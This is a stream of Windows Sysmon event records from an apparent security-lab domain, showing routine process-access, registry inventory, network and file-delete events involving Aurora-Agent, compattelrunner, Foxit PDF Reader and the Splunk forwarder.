Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.853{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.849{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.822{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.774{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.706{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.659{FE4C2B44-E333-63C7-FF05-00000000AF02}61883596C:\Windows\system32\conhost.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.659{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E333-63C7-FF05-00000000AF02}6188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.659{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.659{FE4C2B44-D9F5-63C7-1200-00000000AF02}7566572C:\Windows\System32\svchost.exe{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|c:\windows\system32\pcasvc.dll+43591|c:\windows\system32\pcasvc.dll+22bed|C:\Windows\SYSTEM32\ntdll.dll+7de2d|C:\Windows\SYSTEM32\ntdll.dll+3a979|C:\Windows\SYSTEM32\ntdll.dll+1e87f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.612{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE66D76EF7A91D7525F87EBD735AB210,SHA256=A17F6DC9BC4F32187B5509FD11CBD4BCCDFFF6DCCB24410A7B375F781A21B2A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000039639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.866{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56218-false184.105.214.144-443https 354300x800000000000000039638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.802{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60488- 23542300x800000000000000015072Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:52.563{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E1FC3F3DBFF72F56850E40D3C279D12,SHA256=F5055CA9080C032428328F60CB77FCE5C3C0EF51A88C77E9325F5DA557847542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.815{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADD5F9AAE3D2132666B32EF4A6D1B0CD,SHA256=FF68F73E404A797066C0752DC7B506B39DD0E20DDC48D2F23FDD2970E0B69105,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:52.814{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51072CAC7837CF5EB024D57013DACECD,SHA256=DF9D3E8206ED497B8D3252F4DC038B0E15FB6775A57666C11385434EC69D3858,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000039726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\unins000.exe|a56d22f9565089c\BinProductVersion0.0.0.0 13241300x800000000000000039725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\unins000.exe|a56d22f9565089c\LinkDate04/06/2016 14:39:05 13241300x800000000000000039724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\unins000.exe|a56d22f9565089c\Publisher(Empty) 13241300x800000000000000039723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\unins000.exe|a56d22f9565089c\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\unins000.exe 13241300x800000000000000039722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\trackreview.exe|786f684a9109af4\BinProductVersion12.0.0.12354 13241300x800000000000000039721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\trackreview.exe|786f684a9109af4\LinkDate05/20/2022 14:55:49 13241300x800000000000000039720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\trackreview.exe|786f684a9109af4\Publisherfoxit software inc. 13241300x800000000000000039719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\trackreview.exe|786f684a9109af4\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\trackreview.exe 13241300x800000000000000039718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\sendcrashreport.|d79250f26b84db3d\BinProductVersion12.0.0.1203 13241300x800000000000000039717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\sendcrashreport.|d79250f26b84db3d\LinkDate05/20/2022 15:07:56 13241300x800000000000000039716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\sendcrashreport.|d79250f26b84db3d\Publisherfoxit corporation 13241300x800000000000000039715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\sendcrashreport.|d79250f26b84db3d\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\sendcrashreport.exe 13241300x800000000000000039714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\od3dpdfconvertor|81b8538a277ceb06\BinProductVersion(Empty) 13241300x800000000000000039713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\od3dpdfconvertor|81b8538a277ceb06\LinkDate05/11/2022 10:00:58 13241300x800000000000000039712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\od3dpdfconvertor|81b8538a277ceb06\Publisher(Empty) 13241300x800000000000000039711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\od3dpdfconvertor|81b8538a277ceb06\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\plugins\pdf3d\od3dpdfconvertor.exe 13241300x800000000000000039710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitupdater.exe|bca8dd74adc96ab6\BinProductVersion12.1.0.15192 13241300x800000000000000039709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitupdater.exe|bca8dd74adc96ab6\LinkDate11/28/2022 06:56:16 13241300x800000000000000039708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitupdater.exe|bca8dd74adc96ab6\Publisherfoxit corporation 13241300x800000000000000039707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PathSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitupdater.exe|bca8dd74adc96ab6\LowerCaseLongPathc:\program files (x86)\foxit software\foxit pdf reader\foxitupdater.exe 13241300x800000000000000039706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-VerSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpreviewhost|5bd850ff9cc7b40\BinProductVersion12.1.0.902 13241300x800000000000000039705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-CompileTimeClaimSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpreviewhost|5bd850ff9cc7b40\LinkDate11/28/2022 10:04:13 13241300x800000000000000039704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localInvDB-PubSetValue2023-01-18 12:16:52.626{FE4C2B44-E333-63C7-FE05-00000000AF02}5372C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{6d1e428c-e8ee-7858-3823-1e4d4d9e6b5f}\Root\InventoryApplicationFile\foxitpreviewhost|5bd850ff9cc7b40\Publisherfoxit corporation 